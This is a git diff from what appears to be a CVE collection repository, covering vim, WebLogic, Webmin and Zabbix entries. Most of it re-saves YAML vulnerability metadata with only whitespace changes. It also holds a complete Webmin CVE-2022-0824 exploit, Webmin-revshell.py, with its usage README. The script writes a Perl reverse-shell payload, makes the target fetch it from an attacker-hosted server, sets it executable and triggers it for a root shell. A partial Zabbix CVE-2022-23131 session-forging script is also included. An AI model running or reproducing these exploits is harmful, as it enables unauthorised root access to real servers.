+─────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ SOURCE (CODE) ]─────────────────────────────────────────────────────────────────────────────────────────────────────────────────
+In file: /root/test/vim/src/mbyte.c
+   2140  */
+   2141     int
+   2142 utfc_ptr2len(char_u *p)
+   2143 {
+   2144     int                len;
+ ► 2145     int                b0 = *p;
+   2146 #ifdef FEAT_ARABIC
+   2147     int                prevlen;
+   2148 #endif
+   2149
+   2150     if (b0 == NUL)
+─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ STACK ]─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
+00:0000│ rsp 0x7fffffffb450 —▸ 0x7fffffffb460 —▸ 0x7fffffffb480 —▸ 0x7fffffffb540 —▸ 0x7fffffffb5a0 ◂— ...
+01:0008│     0x7fffffffb458 ◂— 0x0
+02:0010│     0x7fffffffb460 —▸ 0x7fffffffb480 —▸ 0x7fffffffb540 —▸ 0x7fffffffb5a0 —▸ 0x7fffffffb5c0 ◂— ...
+03:0018│     0x7fffffffb468 —▸ 0x555555638c90 (putcmdline+100) ◂— mov eax, dword ptr [rbp - 4]
+04:0020│ rbp 0x7fffffffb470 —▸ 0x7fffffffb480 —▸ 0x7fffffffb540 —▸ 0x7fffffffb5a0 —▸ 0x7fffffffb5c0 ◂— ...
+05:0028│     0x7fffffffb478 —▸ 0x555555638d0c (unputcmdline+101) ◂— mov edx, eax
+06:0030│     0x7fffffffb480 —▸ 0x7fffffffb540 —▸ 0x7fffffffb5a0 —▸ 0x7fffffffb5c0 —▸ 0x7fffffffb5f0 ◂— ...
+07:0038│     0x7fffffffb488 —▸ 0x55555565e74b (vgetorpeek+3187) ◂— jmp 0x55555565e752
+───────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ BACKTRACE ]───────────────────────────────────────────────────────────────────────────────────────────────────────────────────
+ ► f 0   0x555555699519 utfc_ptr2len+20
+   f 1   0x555555638d0c unputcmdline+101
+   f 2   0x55555565e74b vgetorpeek+3187
+   f 3   0x55555565b8a6 vgetc+250
+   f 4   0x55555565bf9e safe_vgetc+17
+   f 5   0x5555556aec0f get_number+126
+   f 6   0x5555556aedd7 prompt_for_number+115
+   f 7   0x55555578f2b8 spell_suggest+2101
+```
+
+[PoC](https://raw.githubusercontent.com/khoanguyenxuan/testing/main/poc.dat)
+
+## Impact
+
 NULL Pointer Dereference in function utfc_ptr2len allows attackers to cause a denial of service (application crash) via a crafted input.
\ No newline at end of file
diff --git a/cve/vim/2023/yaml/CVE-2023-0288.yaml b/cve/vim/2023/yaml/CVE-2023-0288.yaml
index 08329eac..92997801 100644
--- a/cve/vim/2023/yaml/CVE-2023-0288.yaml
+++ b/cve/vim/2023/yaml/CVE-2023-0288.yaml
@@ -1,19 +1,19 @@
-id: CVE-2023-0288
-source: https://huntr.dev/bounties/550a0852-9be0-4abe-906c-f803b34e41d3/
-info:
-  name: Vim是一款基于UNIX平台的编辑器。
-  severity: high
-  description: |
-    GitHub存储库vim/vim在9.0.1182版本存在堆buffer溢出漏洞。
-  scope-of-influence:
-    vim < 9.0.1182
-  reference:
-    - https://nvd.nist.gov/vuln/detail/CVE-2023-0288
-  classification:
-    cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
-    cvss-score: 7.8
-    cve-id: CVE-2023-0288
-    cwe-id: CWE-122
-    cnvd-id: None
-    kve-id: None
+id: CVE-2023-0288
+source: https://huntr.dev/bounties/550a0852-9be0-4abe-906c-f803b34e41d3/
+info:
+  name: Vim是一款基于UNIX平台的编辑器。
+  severity: high
+  description: |
+    GitHub存储库vim/vim在9.0.1182版本存在堆buffer溢出漏洞。
+  scope-of-influence:
+    vim < 9.0.1182
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-0288
+  classification:
+    cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
+    cvss-score: 7.8
+    cve-id: CVE-2023-0288
+    cwe-id: CWE-122
+    cnvd-id: None
+    kve-id: None
   tags: cve2023, 堆buffer溢出漏洞
\ No newline at end of file
diff --git a/cve/vim/2023/yaml/CVE-2023-0512.yaml b/cve/vim/2023/yaml/CVE-2023-0512.yaml
index d0060dc5..43291f7a 100644
--- a/cve/vim/2023/yaml/CVE-2023-0512.yaml
+++ b/cve/vim/2023/yaml/CVE-2023-0512.yaml
@@ -1,19 +1,19 @@
-id: CVE-2023-0512
-source: https://huntr.dev/bounties/de83736a-1936-4872-830b-f1e9b0ad2a74/
-info:
-  name: Vim是一款基于UNIX平台的编辑器。
-  severity: high
-  description: |
-   vim软件包的src/move.c文件中adjust_skipcol()函数存在除以0的浮点异常问题，该漏洞可导致程序崩溃、数据出错等。
-  scope-of-influence:
-    vim < 9.0.1247
-  reference:
-    - https://nvd.nist.gov/vuln/detail/CVE-2023-0512
-  classification:
-    cvss-metrics:  CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
-    cvss-score: 7.8
-    cve-id: CVE-2023-0512
-    cwe-id: CWE-369
-    cnvd-id: None
-    kve-id: None
+id: CVE-2023-0512
+source: https://huntr.dev/bounties/de83736a-1936-4872-830b-f1e9b0ad2a74/
+info:
+  name: Vim是一款基于UNIX平台的编辑器。
+  severity: high
+  description: |
+   vim软件包的src/move.c文件中adjust_skipcol()函数存在除以0的浮点异常问题，该漏洞可导致程序崩溃、数据出错等。
+  scope-of-influence:
+    vim < 9.0.1247
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-0512
+  classification:
+    cvss-metrics:  CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
+    cvss-score: 7.8
+    cve-id: CVE-2023-0512
+    cwe-id: CWE-369
+    cnvd-id: None
+    kve-id: None
   tags: cve2023, 除零错误
\ No newline at end of file
diff --git a/cve/vim/2023/yaml/CVE-2023-1264.yaml b/cve/vim/2023/yaml/CVE-2023-1264.yaml
index 569d8a34..6669ae9c 100644
--- a/cve/vim/2023/yaml/CVE-2023-1264.yaml
+++ b/cve/vim/2023/yaml/CVE-2023-1264.yaml
@@ -1,20 +1,20 @@
-id: CVE-2023-1264
-source: https://huntr.dev/bounties/b2989095-88f3-413a-9a39-c1c58a6e6815/
-info:
-  name: Vim是一款基于UNIX平台的编辑器。
-  severity: medium
-  description: |
-    NULL Pointer Dereference in GitHub repository vim/vim prior to 9.0.1392.
-  scope-of-influence:
-    vim < 9.0.1392
-  reference:
-    - https://nvd.nist.gov/vuln/detail/CVE-2023-1264
-    - https://github.com/vim/vim/commit/7ac5023a5f1a37baafbe1043645f97ba3443d9f6
-  classification:
-    cvss-metrics:  CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H
-    cvss-score: 5.5
-    cve-id: CVE-2023-1264
-    cwe-id: CWE-476
-    cnvd-id: None
-    kve-id: None
+id: CVE-2023-1264
+source: https://huntr.dev/bounties/b2989095-88f3-413a-9a39-c1c58a6e6815/
+info:
+  name: Vim是一款基于UNIX平台的编辑器。
+  severity: medium
+  description: |
+    NULL Pointer Dereference in GitHub repository vim/vim prior to 9.0.1392.
+  scope-of-influence:
+    vim < 9.0.1392
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-1264
+    - https://github.com/vim/vim/commit/7ac5023a5f1a37baafbe1043645f97ba3443d9f6
+  classification:
+    cvss-metrics:  CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H
+    cvss-score: 5.5
+    cve-id: CVE-2023-1264
+    cwe-id: CWE-476
+    cnvd-id: None
+    kve-id: None
   tags: cve2023, 空指针解引用
\ No newline at end of file
diff --git a/cve/weblogic/2020/yaml/CVE-2020-14882.yaml b/cve/weblogic/2020/yaml/CVE-2020-14882.yaml
index 94ff4774..594d11ac 100644
--- a/cve/weblogic/2020/yaml/CVE-2020-14882.yaml
+++ b/cve/weblogic/2020/yaml/CVE-2020-14882.yaml
@@ -1,23 +1,23 @@
-id: CVE-2020-14882
-source: https://github.com/zhzyker/exphub/blob/master/weblogic/cve-2020-14882_rce.py
-info:
-  name: WebLogic是美国Oracle公司出品的一个application server，是一个基于JAVAEE架构的中间件，WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。
-  severity: critical
-  description: |
-    CVE-2020-14882允许未授权的用户绕过管理控制台的权限验证访问后台
-  scope-of-influence:
-    weblogic 10.3.6.0.0, weblogic 12.1.3.0.0, weblogic 12.2.1.3.0, weblogic 12.2.1.4.0
-  reference:
-    https://nvd.nist.gov/vuln/detail/CVE-2020-14882
-    https://www.oracle.com/security-alerts/cpuoct2020.html
-    http://packetstormsecurity.com/files/159769/Oracle-WebLogic-Server-Remote-Code-Execution.html
-    http://packetstormsecurity.com/files/160143/Oracle-WebLogic-Server-Administration-Console-Handle-Remote-Code-Execution.html
-    http://packetstormsecurity.com/files/161128/Oracle-WebLogic-Server-12.2.1.0-Remote-Code-Execution.html
-  classification:
-    cvss-metrics:  CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
-    cvss-score: 9.8
-    cve-id: CVE-2020-14882
-    cwe-id: None
-    cnvd-id: None
-    kve-id: None
+id: CVE-2020-14882
+source: https://github.com/zhzyker/exphub/blob/master/weblogic/cve-2020-14882_rce.py
+info:
+  name: WebLogic是美国Oracle公司出品的一个application server，是一个基于JAVAEE架构的中间件，WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。
+  severity: critical
+  description: |
+    CVE-2020-14882允许未授权的用户绕过管理控制台的权限验证访问后台
+  scope-of-influence:
+    weblogic 10.3.6.0.0, weblogic 12.1.3.0.0, weblogic 12.2.1.3.0, weblogic 12.2.1.4.0
+  reference:
+    https://nvd.nist.gov/vuln/detail/CVE-2020-14882
+    https://www.oracle.com/security-alerts/cpuoct2020.html
+    http://packetstormsecurity.com/files/159769/Oracle-WebLogic-Server-Remote-Code-Execution.html
+    http://packetstormsecurity.com/files/160143/Oracle-WebLogic-Server-Administration-Console-Handle-Remote-Code-Execution.html
+    http://packetstormsecurity.com/files/161128/Oracle-WebLogic-Server-12.2.1.0-Remote-Code-Execution.html
+  classification:
+    cvss-metrics:  CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2020-14882
+    cwe-id: None
+    cnvd-id: None
+    kve-id: None
   tags: cve2020, Weblogic
\ No newline at end of file
diff --git a/cve/webmin/2022/CVE-2022-0824/README.md b/cve/webmin/2022/CVE-2022-0824/README.md
old mode 100755
new mode 100644
index 7b23df28..9b20e2be
--- a/cve/webmin/2022/CVE-2022-0824/README.md
+++ b/cve/webmin/2022/CVE-2022-0824/README.md
@@ -1,58 +1,58 @@
-# Webmin-CVE-2022-0824-revshell
-
-
-## Vulnerability Description
-
-Webmin 1.984 and below - File Manager privilege exploit (CVE-2022-0824 and CVE-2022-0829)  
-Less privileged Webmin users who do not have any File Manager module restrictions configured can access files with root privileges, if using the default Authentic theme. All systems with additional untrusted Webmin users should upgrade immediately. Note that Virtualmin systems are not effected by this bug, due to the way domain owner Webmin users are configured.  
-_Source: https://www.webmin.com/security.html_
-
-## Exploit Description
-
-This exploit takes advantage of the post-auth Improper Access Control vulnerability in File Manager. This exploit could be done by any less privileged authenticated attacker. It will download a .cgi file remotely from an attacker-controlled server and modify its permission to be a world-executables file. Once this is done, it will execute the .cgi file to establish a reverse connection to the attacker-controller server with root privileges.
-
-_Reference: https://huntr.dev/bounties/d0049a96-de90-4b1a-9111-94de1044f295/_
-
-## Usage
-
-    $~ python3 Webmin-revshell.py -t [TARGET] -c [CREDENTIAL] -LS [PY3HTTP_SERVER] -L [CALLBACK_IP] -P [CALLBACK_PORT]
-    $~ python3 Webmin-revshell.py -t https://192.168.5.118:10000 -c user:user123 -LS 192.168.5.120:9090 -L 192.168.5.120 -P 4444
-    
-    $~  python3 Webmin-revshell.py -h                                                                                                                                    
-        usage: Webmin-revshell.py [-h] -t TARGET -c CREDENTIAL -LS PY3HTTP_SERVER -L CALLBACK_IP -P CALLBACK_PORT [-V]
-
-        Webmin CVE-2022-0824 Reverse Shell
-
-        optional arguments:
-          -h, --help            show this help message and exit
-          -t TARGET, --target TARGET
-                                Target full URL, https://www.webmin.local:10000
-          -c CREDENTIAL, --credential CREDENTIAL
-                                Format, user:user123
-          -LS PY3HTTP_SERVER, --py3http_server PY3HTTP_SERVER
-                                Http server for serving payload, ex 192.168.5.120:8080
-          -L CALLBACK_IP, --callback_ip CALLBACK_IP
-                                Callback IP to receive revshell
-          -P CALLBACK_PORT, --callback_port CALLBACK_PORT
-                                Callback port to receive revshell
-          -V, --version         show program's version number and exit
-
-## PoC
-
-    target host: https://192.168.5.118:10000
-    attacker host: 192.168.5.120
-
-
-https://user-images.githubusercontent.com/51811615/156904265-80c2ee4f-8447-41cd-9197-446bf6555e25.mp4
-
-
-## Tested on
-    
-    - Webmin 1.984
-    - Ubuntu 18.04
-    - Kali 2021.3
-
-
-## Disclaimer:
-
-    The script is for security analysis and research only, hence I would not be liable if it is been used for illicit activities
+# Webmin-CVE-2022-0824-revshell
+
+
+## Vulnerability Description
+
+Webmin 1.984 and below - File Manager privilege exploit (CVE-2022-0824 and CVE-2022-0829)  
+Less privileged Webmin users who do not have any File Manager module restrictions configured can access files with root privileges, if using the default Authentic theme. All systems with additional untrusted Webmin users should upgrade immediately. Note that Virtualmin systems are not effected by this bug, due to the way domain owner Webmin users are configured.  
+_Source: https://www.webmin.com/security.html_
+
+## Exploit Description
+
+This exploit takes advantage of the post-auth Improper Access Control vulnerability in File Manager. This exploit could be done by any less privileged authenticated attacker. It will download a .cgi file remotely from an attacker-controlled server and modify its permission to be a world-executables file. Once this is done, it will execute the .cgi file to establish a reverse connection to the attacker-controller server with root privileges.
+
+_Reference: https://huntr.dev/bounties/d0049a96-de90-4b1a-9111-94de1044f295/_
+
+## Usage
+
+    $~ python3 Webmin-revshell.py -t [TARGET] -c [CREDENTIAL] -LS [PY3HTTP_SERVER] -L [CALLBACK_IP] -P [CALLBACK_PORT]
+    $~ python3 Webmin-revshell.py -t https://192.168.5.118:10000 -c user:user123 -LS 192.168.5.120:9090 -L 192.168.5.120 -P 4444
+    
+    $~  python3 Webmin-revshell.py -h                                                                                                                                    
+        usage: Webmin-revshell.py [-h] -t TARGET -c CREDENTIAL -LS PY3HTTP_SERVER -L CALLBACK_IP -P CALLBACK_PORT [-V]
+
+        Webmin CVE-2022-0824 Reverse Shell
+
+        optional arguments:
+          -h, --help            show this help message and exit
+          -t TARGET, --target TARGET
+                                Target full URL, https://www.webmin.local:10000
+          -c CREDENTIAL, --credential CREDENTIAL
+                                Format, user:user123
+          -LS PY3HTTP_SERVER, --py3http_server PY3HTTP_SERVER
+                                Http server for serving payload, ex 192.168.5.120:8080
+          -L CALLBACK_IP, --callback_ip CALLBACK_IP
+                                Callback IP to receive revshell
+          -P CALLBACK_PORT, --callback_port CALLBACK_PORT
+                                Callback port to receive revshell
+          -V, --version         show program's version number and exit
+
+## PoC
+
+    target host: https://192.168.5.118:10000
+    attacker host: 192.168.5.120
+
+
+https://user-images.githubusercontent.com/51811615/156904265-80c2ee4f-8447-41cd-9197-446bf6555e25.mp4
+
+
+## Tested on
+    
+    - Webmin 1.984
+    - Ubuntu 18.04
+    - Kali 2021.3
+
+
+## Disclaimer:
+
+    The script is for security analysis and research only, hence I would not be liable if it is been used for illicit activities
diff --git a/cve/webmin/2022/CVE-2022-0824/Webmin-revshell.py b/cve/webmin/2022/CVE-2022-0824/Webmin-revshell.py
old mode 100755
new mode 100644
index 2f27a1d2..cde6a67e
--- a/cve/webmin/2022/CVE-2022-0824/Webmin-revshell.py
+++ b/cve/webmin/2022/CVE-2022-0824/Webmin-revshell.py
@@ -1,146 +1,146 @@
-#!/usr/bin/python3
-
-"""
-Coded by: @faisalfs10x
-GitHub: https://github.com/faisalfs10x
-Reference: https://huntr.dev/bounties/d0049a96-de90-4b1a-9111-94de1044f295/
-""" 
-
-import requests
-import urllib3
-import argparse
-import os
-import time
-
-urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
-
-TGREEN =  '\033[32m'
-TRED =  '\033[31m' 
-TCYAN =  '\033[36m' 
-TSHELL =  '\033[32;1m' 
-ENDC = '\033[m'
-
-class Exploit(object):
-    def __init__(self, target, username, password, py3http_server, pyhttp_port, upload_path, callback_ip, callback_port, fname):
-        self.target = target
-        self.username = username
-        self.password = password
-        self.py3http_server = py3http_server
-        self.pyhttp_port = pyhttp_port
-        self.upload_path = upload_path
-        self.callback_ip = callback_ip
-        self.callback_port = callback_port
-        self.fname = fname
-
-        #self.proxies = proxies
-        self.s = requests.Session()
-
-
-    def gen_payload(self):
-        payload = ('''perl -e 'use Socket;$i="''' + self.callback_ip  + '''";$p=''' + self.callback_port + ''';socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};' ''')
-        print(TCYAN + f"\n[+] Generating payload to {self.fname} in current directory", ENDC)
-        f = open(f"{self.fname}", "w")
-        f.write(payload)
-        f.close()
-
-    def login(self):
-        login_url = self.target + "/session_login.cgi"
-        cookies = { "redirect": "1", "testing": "1", "PHPSESSID": "" }
-
-        data = { 'user' : self.username, 'pass' : self.password }
-        try:
-            r = self.s.post(login_url, data=data, cookies=cookies, verify=False, allow_redirects=True, timeout=10)
-            success_message = 'System hostname'
-            if success_message in r.text:
-                print(TGREEN + "[+] Login Successful", ENDC)
-            else:
-                print(TRED +"[-] Login Failed", ENDC)
-                exit()
-
-        except requests.Timeout as e:
-            print(TRED + f"[-] Target: {self.target} is not responding, Connection timed out", ENDC)
-            exit()
-
-    def pyhttp_server(self):
-        print(f'[+] Attempt to host http.server on {self.pyhttp_port}\n')
-        os.system(f'(setsid $(which python3) -m http.server {self.pyhttp_port} 0>&1 & ) ') # add 2>/dev/null for clean up
-        print('[+] Sleep 3 second to ensure http server is up!')
-        time.sleep(3) # Sleep for 5 seconds to ensure http server is up!
-
-    def download_remote_url(self):
-        download_url = self.target + "/extensions/file-manager/http_download.cgi?module=filemin"
-        headers = { 
-                    "Accept": "application/json, text/javascript, */*; q=0.01", 
-                    "Accept-Encoding": "gzip, deflate", 
-                    "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", 
-                    "X-Requested-With": "XMLHttpRequest", 
-                    "Referer": self.target + "/filemin/?xnavigation=1" 
-        }
-
-        data = { 
-                'link': "http://" + self.py3http_server + "/" + self.fname, 
-                'username': '', 
-                'password': '', 
-                'path': self.upload_path 
-        }
-
-        r = self.s.post(download_url, data=data, headers=headers, verify=False, allow_redirects=True)
-        print(f"\n[+] Fetching {self.fname} from http.server {self.py3http_server}")
-
-    def modify_permission(self):
-        modify_perm_url = self.target + "/extensions/file-manager/chmod.cgi?module=filemin&page=1&paginate=30"
-        headers = { "Referer": self.target + "/filemin/?xnavigation=1" }
-        data = { "name": self.fname, "perms": "0755", "applyto": "1", "path": self.upload_path }
-       
-        r = self.s.post(modify_perm_url, data=data, headers=headers, verify=False, allow_redirects=True)
-        print(f"[+] Modifying permission of {self.fname} to 0755")
-
-    def exec_revshell(self):
-        url = self.target + '/' + self.fname
-        try:
-            r = self.s.get(url, verify=False, allow_redirects=True, timeout=3)
-        except requests.Timeout as e: # check target whether make response in 3s, then it indicates shell has been spawned!
-            print(TGREEN + f"\n[+] Success: shell spawned to {self.callback_ip} via port {self.callback_port} - XD", ENDC)
-            print("[+] Shell location: " + url)
-        else:
-            print(TRED + f"\n[-] Please setup listener first and try again with: nc -lvp {self.callback_port}", ENDC)
-
-    def do_cleanup(self):
-        print(TCYAN + '\n[+] Cleaning up ')
-        print(f'[+] Killing: http.server on port {self.pyhttp_port}')
-        os.system(f'kill -9 $(lsof -t -i:{self.pyhttp_port})')
-        exit()
-
-    def run(self):
-        self.gen_payload()
-        self.login()
-        self.pyhttp_server()
-        self.download_remote_url()
-        self.modify_permission()
-        self.exec_revshell()
-        self.do_cleanup()
-
-
-if __name__ == "__main__":
-
-    parser = argparse.ArgumentParser(description='Webmin CVE-2022-0824 Reverse Shell')
-    parser.add_argument('-t', '--target', type=str, required=True, help=' Target full URL, https://www.webmin.local:10000')
-    parser.add_argument('-c', '--credential', type=str, required=True, help=' Format, user:user123')
-    parser.add_argument('-LS', '--py3http_server', type=str, required=True, help=' Http server for serving payload, ex 192.168.8.120:8080')
-    parser.add_argument('-L', '--callback_ip', type=str, required=True, help=' Callback IP to receive revshell')
-    parser.add_argument('-P', '--callback_port', type=str, required=True, help=' Callback port to receive revshell')
-    parser.add_argument("-V",'--version', action='version', version='%(prog)s 1.0')
-    args = parser.parse_args()
-
-    target = args.target
-    username = args.credential.split(':')[0]
-    password = args.credential.split(':')[1]
-    py3http_server = args.py3http_server
-    pyhttp_port = py3http_server.split(':')[1]
-    callback_ip = args.callback_ip
-    callback_port = args.callback_port
-    upload_path = "/usr/share/webmin"
-    fname = "revshell.cgi"
-
-    pwn = Exploit(target, username, password, py3http_server, pyhttp_port, upload_path, callback_ip, callback_port, fname)
+#!/usr/bin/python3
+
+"""
+Coded by: @faisalfs10x
+GitHub: https://github.com/faisalfs10x
+Reference: https://huntr.dev/bounties/d0049a96-de90-4b1a-9111-94de1044f295/
+""" 
+
+import requests
+import urllib3
+import argparse
+import os
+import time
+
+urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
+
+TGREEN =  '\033[32m'
+TRED =  '\033[31m' 
+TCYAN =  '\033[36m' 
+TSHELL =  '\033[32;1m' 
+ENDC = '\033[m'
+
+class Exploit(object):
+    def __init__(self, target, username, password, py3http_server, pyhttp_port, upload_path, callback_ip, callback_port, fname):
+        self.target = target
+        self.username = username
+        self.password = password
+        self.py3http_server = py3http_server
+        self.pyhttp_port = pyhttp_port
+        self.upload_path = upload_path
+        self.callback_ip = callback_ip
+        self.callback_port = callback_port
+        self.fname = fname
+
+        #self.proxies = proxies
+        self.s = requests.Session()
+
+
+    def gen_payload(self):
+        payload = ('''perl -e 'use Socket;$i="''' + self.callback_ip  + '''";$p=''' + self.callback_port + ''';socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};' ''')
+        print(TCYAN + f"\n[+] Generating payload to {self.fname} in current directory", ENDC)
+        f = open(f"{self.fname}", "w")
+        f.write(payload)
+        f.close()
+
+    def login(self):
+        login_url = self.target + "/session_login.cgi"
+        cookies = { "redirect": "1", "testing": "1", "PHPSESSID": "" }
+
+        data = { 'user' : self.username, 'pass' : self.password }
+        try:
+            r = self.s.post(login_url, data=data, cookies=cookies, verify=False, allow_redirects=True, timeout=10)
+            success_message = 'System hostname'
+            if success_message in r.text:
+                print(TGREEN + "[+] Login Successful", ENDC)
+            else:
+                print(TRED +"[-] Login Failed", ENDC)
+                exit()
+
+        except requests.Timeout as e:
+            print(TRED + f"[-] Target: {self.target} is not responding, Connection timed out", ENDC)
+            exit()
+
+    def pyhttp_server(self):
+        print(f'[+] Attempt to host http.server on {self.pyhttp_port}\n')
+        os.system(f'(setsid $(which python3) -m http.server {self.pyhttp_port} 0>&1 & ) ') # add 2>/dev/null for clean up
+        print('[+] Sleep 3 second to ensure http server is up!')
+        time.sleep(3) # Sleep for 5 seconds to ensure http server is up!
+
+    def download_remote_url(self):
+        download_url = self.target + "/extensions/file-manager/http_download.cgi?module=filemin"
+        headers = { 
+                    "Accept": "application/json, text/javascript, */*; q=0.01", 
+                    "Accept-Encoding": "gzip, deflate", 
+                    "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", 
+                    "X-Requested-With": "XMLHttpRequest", 
+                    "Referer": self.target + "/filemin/?xnavigation=1" 
+        }
+
+        data = { 
+                'link': "http://" + self.py3http_server + "/" + self.fname, 
+                'username': '', 
+                'password': '', 
+                'path': self.upload_path 
+        }
+
+        r = self.s.post(download_url, data=data, headers=headers, verify=False, allow_redirects=True)
+        print(f"\n[+] Fetching {self.fname} from http.server {self.py3http_server}")
+
+    def modify_permission(self):
+        modify_perm_url = self.target + "/extensions/file-manager/chmod.cgi?module=filemin&page=1&paginate=30"
+        headers = { "Referer": self.target + "/filemin/?xnavigation=1" }
+        data = { "name": self.fname, "perms": "0755", "applyto": "1", "path": self.upload_path }
+       
+        r = self.s.post(modify_perm_url, data=data, headers=headers, verify=False, allow_redirects=True)
+        print(f"[+] Modifying permission of {self.fname} to 0755")
+
+    def exec_revshell(self):
+        url = self.target + '/' + self.fname
+        try:
+            r = self.s.get(url, verify=False, allow_redirects=True, timeout=3)
+        except requests.Timeout as e: # check target whether make response in 3s, then it indicates shell has been spawned!
+            print(TGREEN + f"\n[+] Success: shell spawned to {self.callback_ip} via port {self.callback_port} - XD", ENDC)
+            print("[+] Shell location: " + url)
+        else:
+            print(TRED + f"\n[-] Please setup listener first and try again with: nc -lvp {self.callback_port}", ENDC)
+
+    def do_cleanup(self):
+        print(TCYAN + '\n[+] Cleaning up ')
+        print(f'[+] Killing: http.server on port {self.pyhttp_port}')
+        os.system(f'kill -9 $(lsof -t -i:{self.pyhttp_port})')
+        exit()
+
+    def run(self):
+        self.gen_payload()
+        self.login()
+        self.pyhttp_server()
+        self.download_remote_url()
+        self.modify_permission()
+        self.exec_revshell()
+        self.do_cleanup()
+
+
+if __name__ == "__main__":
+
+    parser = argparse.ArgumentParser(description='Webmin CVE-2022-0824 Reverse Shell')
+    parser.add_argument('-t', '--target', type=str, required=True, help=' Target full URL, https://www.webmin.local:10000')
+    parser.add_argument('-c', '--credential', type=str, required=True, help=' Format, user:user123')
+    parser.add_argument('-LS', '--py3http_server', type=str, required=True, help=' Http server for serving payload, ex 192.168.8.120:8080')
+    parser.add_argument('-L', '--callback_ip', type=str, required=True, help=' Callback IP to receive revshell')
+    parser.add_argument('-P', '--callback_port', type=str, required=True, help=' Callback port to receive revshell')
+    parser.add_argument("-V",'--version', action='version', version='%(prog)s 1.0')
+    args = parser.parse_args()
+
+    target = args.target
+    username = args.credential.split(':')[0]
+    password = args.credential.split(':')[1]
+    py3http_server = args.py3http_server
+    pyhttp_port = py3http_server.split(':')[1]
+    callback_ip = args.callback_ip
+    callback_port = args.callback_port
+    upload_path = "/usr/share/webmin"
+    fname = "revshell.cgi"
+
+    pwn = Exploit(target, username, password, py3http_server, pyhttp_port, upload_path, callback_ip, callback_port, fname)
     pwn.run()
\ No newline at end of file
diff --git a/cve/webmin/2022/yaml/CVE-2022-0824.yaml b/cve/webmin/2022/yaml/CVE-2022-0824.yaml
old mode 100755
new mode 100644
index 759b4b56..691f234f
--- a/cve/webmin/2022/yaml/CVE-2022-0824.yaml
+++ b/cve/webmin/2022/yaml/CVE-2022-0824.yaml
@@ -1,20 +1,20 @@
-id: CVE-2022-0824
-source: https://github.com/faisalfs10x/Webmin-CVE-2022-0824-revshell
-info:
-  name: Webmin是用于类Unix系统的基于Web的服务器管理控制面板。
-  severity: high
-  description: |
-    在GitHub仓库webmin/webmin 1.990之前，访问控制不当导致远程代码执行。
-  scope-of-influence:
-    webmin < 1.990
-  reference:
-    - https://nvd.nist.gov/vuln/detail/cve-2022-0824
-  classification:
-    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
-    cvss-score: 8.8
-    cve-id: CVE-2022-0824
-    cwe-id: CWE-863, CWE-284
-    cnvd-id: None
-    kve-id: None
-  tags: cve2022, RCE
+id: CVE-2022-0824
+source: https://github.com/faisalfs10x/Webmin-CVE-2022-0824-revshell
+info:
+  name: Webmin是用于类Unix系统的基于Web的服务器管理控制面板。
+  severity: high
+  description: |
+    在GitHub仓库webmin/webmin 1.990之前，访问控制不当导致远程代码执行。
+  scope-of-influence:
+    webmin < 1.990
+  reference:
+    - https://nvd.nist.gov/vuln/detail/cve-2022-0824
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 8.8
+    cve-id: CVE-2022-0824
+    cwe-id: CWE-863, CWE-284
+    cnvd-id: None
+    kve-id: None
+  tags: cve2022, RCE
   
\ No newline at end of file
diff --git a/cve/zabbix/2022/CVE-2022-23131/CVE-2022-23131.py b/cve/zabbix/2022/CVE-2022-23131/CVE-2022-23131.py
index 881c7d68..93756db1 100644
--- a/cve/zabbix/2022/CVE-2022-23131/CVE-2022-23131.py
+++ b/cve/zabbix/2022/CVE-2022-23131/CVE-2022-23131.py
@@ -1,37 +1,37 @@
-import requests
-import re
-import urllib.parse
-import base64
-import json
-import sys
- 
-def exp(target, username):
-	resp = requests.get(url=target, verify=False)
-	cookie = resp.headers.get("Set-Cookie")
-
-	zbx_session = re.findall(r"zbx_session=(.*?); ", cookie)
-
-	url_decode_data = urllib.parse.unquote(zbx_session[0], encoding='utf-8')
-	base64_decode_data = base64.b64decode(url_decode_data)
-
-	decode_to_str = str(base64_decode_data, encoding='utf-8')
-
-	to_json = json.loads(decode_to_str)
-
-	tmp_ojb = dict(saml_data=dict(username_attribute=username), sessionid=to_json["sessionid"], sign=to_json["sign"])
-
-	payloadJson = json.dumps(tmp_ojb)
-	print("decode_payload:", payloadJson)
-
-	payload = urllib.parse.quote(base64.b64encode(payloadJson.encode()))
-	print("zbx_signed_session:", payload)
-
-
-if __name__ == "__main__":
-	if len(sys.argv) != 3:
-		print("argv error")
-		exit(0)
-	target = sys.argv[1]
-	username = sys.argv[2]
